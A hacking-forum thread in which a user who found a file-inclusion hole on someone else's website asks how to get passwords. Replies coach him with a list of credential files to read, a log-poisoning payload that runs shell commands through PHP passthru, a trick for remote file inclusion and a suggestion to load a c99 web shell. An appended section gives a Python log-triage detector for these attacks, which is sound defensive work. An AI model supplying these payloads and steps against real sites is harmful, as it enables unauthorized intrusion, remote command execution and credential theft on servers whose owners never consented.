
LFI passwd question


ghost's Avatar

Ok well I was messing around testing sites for LFI when I found a vulnerable one. I was able to get the passwd file:


Now since there is an x for the password, there should be a shadow file, correct? But there is none, or at least it's not in etc/shadow. And sorry for sounding stupid, but how do I get the password and, better yet, what do I do once I have it? lol Thanks



ghost's Avatar

Are you looking to attack the box or just the site? Neither is an option too; let me just ask, "What do you want to do?"


ghost's Avatar

I actually didn't plan on either. I was just learning and experimenting just to see if I could do it and how it works. I want to know what my options are and where the password really is.


ghost's Avatar

jbjoker wrote: I actually didn't plan on either. I was just learning and experimenting just to see if I could do it and how it works. I want to know what my options are and where the password really is.

Well, this may sound somewhat mean, but it's in no intention to do so.

I did not see, "better yet, what do I do once I have it.." in your initial post. You must first ask yourself what you are looking for/trying to do before you ask how you do it. If that made as much sense to you as it did in my head.

But, to help you along the way of experimentation, here's a typical list of "interesting" files to look at:

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Another, maybe more interesting one for you to try is making a shell using their own logs. Simply find the file which stores failed pages (404, not found, etc.) and do: http://www.site.com/<?php passthru($_GET['cmd']);?> and then include the log file in your LFI. This will give you access to run commands. But, the thing you need to know is that you can't do this through your browser because it encodes the page. So, find another way to do it that's not through your browser ;). Shouldn't be that hard.


ghost's Avatar

Well, the LFI vulnerability is in a file called wrapper.php. It allows me to view files without any restrictions. I want RFI so I could use the script suggested before. It doesn't work when I try to execute http://www.example.com/wrapper.php?file=http://www.mysite.com/passhtroughscript.php

I'm not sure what you meant before about using their logs to help me. BTW keep in mind that I'm not that familiar with Linux if you haven't noticed already. As for those interesting files, the only one that existed was group. So once again, I have no passwords or any clue on how to get a remote shell.. I have phpterm, I just can't get it to work. I'm getting confused now. help?


ghost's Avatar

Try to include http://google.com just to make sure RFI works as well as LFI. If it does, just include a c99 shell and browse to /etc to find what's there.


ghost's Avatar

jbjoker wrote: Well, the LFI vulnerability is in a file called wrapper.php. It allows me to view files without any restrictions. I want RFI so I could use the script suggested before. It doesn't work when I try to execute http://www.example.com/wrapper.php?file=http://www.mysite.com/passhtroughscript.php

I'm not sure what you meant before about using their logs to help me. BTW keep in mind that I'm not that familiar with Linux if you haven't noticed already. As for those interesting files, the only one that existed was group. So once again, I have no passwords or any clue on how to get a remote shell.. I have phpterm, I just can't get it to work. I'm getting confused now. help?

For your RFI, in your example it shows that there are no extensions added, which isn't common. Put a ? at the end of your RFI example and then try it. So: http://www.mysite.com/passthroughscript.php?

Using the logs to help you. -> You should find a way to pass: http://www.site.com/<?php $_GET['cmd'];?> without using a browser. Then, you need to find where the logs are kept that keep track of invalid page attempts. Then, you include that page in your LFI and the PHP will execute.
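
From the defending side, both techniques discussed in this thread (the file-parameter includes against wrapper.php and the PHP-in-the-logs trick) leave clear traces in the web server's access log. The following is an added example, not code from any poster: a small triage script over log lines in Apache combined format. The sample lines, the addresses, the harmless marker tag and the assumption that the include parameter is named `file` (taken from the wrapper.php URL above) are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines (Apache combined log format); not taken from the thread.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2008:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2008:13:56:01 +0000] "GET /wrapper.php?file=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2008:13:57:12 +0000] "GET /wrapper.php?file=http://attacker.example/s.php? HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2008:13:58:40 +0000] "GET /<?php /* marker */ ?> HTTP/1.0" 404 210 "-" "-"',
    '203.0.113.9 - - [10/Oct/2008:13:59:02 +0000] "GET /wrapper.php?file=%2Fvar%2Flog%2Fexample%2Faccess_log HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*) HTTP/[\d.]+" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')
PHP_TAG = re.compile(r"<\?(php|=)", re.I)           # PHP open tag, long or short-echo form
REMOTE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # any scheme://, not only http
INCLUDE_PARAMS = {"file"}                            # assumption: parameter names that reach include()

def findings(line):
    """Return the set of indicator names seen in one access-log line."""
    m = LINE.match(line)
    if not m:
        return {"unparsed"}
    _ip, _method, target, _status, referer, agent = m.groups()
    hits = set()
    # Log poisoning: PHP source in any client-controlled field the server logs.
    if any(PHP_TAG.search(unquote(f)) for f in (target, referer, agent)):
        hits.add("php_tag_in_logged_field")
    # Inclusion attempts: inspect the decoded value of each include parameter.
    _path, _, query = target.partition("?")
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in INCLUDE_PARAMS:
            continue
        if REMOTE.match(value):
            hits.add("remote_url_param")
        elif ".." in value.replace("\\", "/").split("/"):
            hits.add("traversal_param")
        elif value.startswith("/"):
            hits.add("absolute_path_param")
    return hits

def triage(lines):
    """Map each client address to the union of indicators seen from it."""
    by_client = {}
    for line in lines:
        hits = findings(line)
        if hits:
            by_client.setdefault(line.split(" ", 1)[0], set()).update(hits)
    return by_client

if __name__ == "__main__":
    for client, hits in triage(SAMPLE_LOG).items():
        print(client, sorted(hits))
```

A client that shows `php_tag_in_logged_field` and then an include-parameter hit pointing at a log path is the sequence the replies describe. On the application side, the durable fix is to map the `file` parameter to a fixed allowlist of pages and keep PHP's `allow_url_include` set to Off.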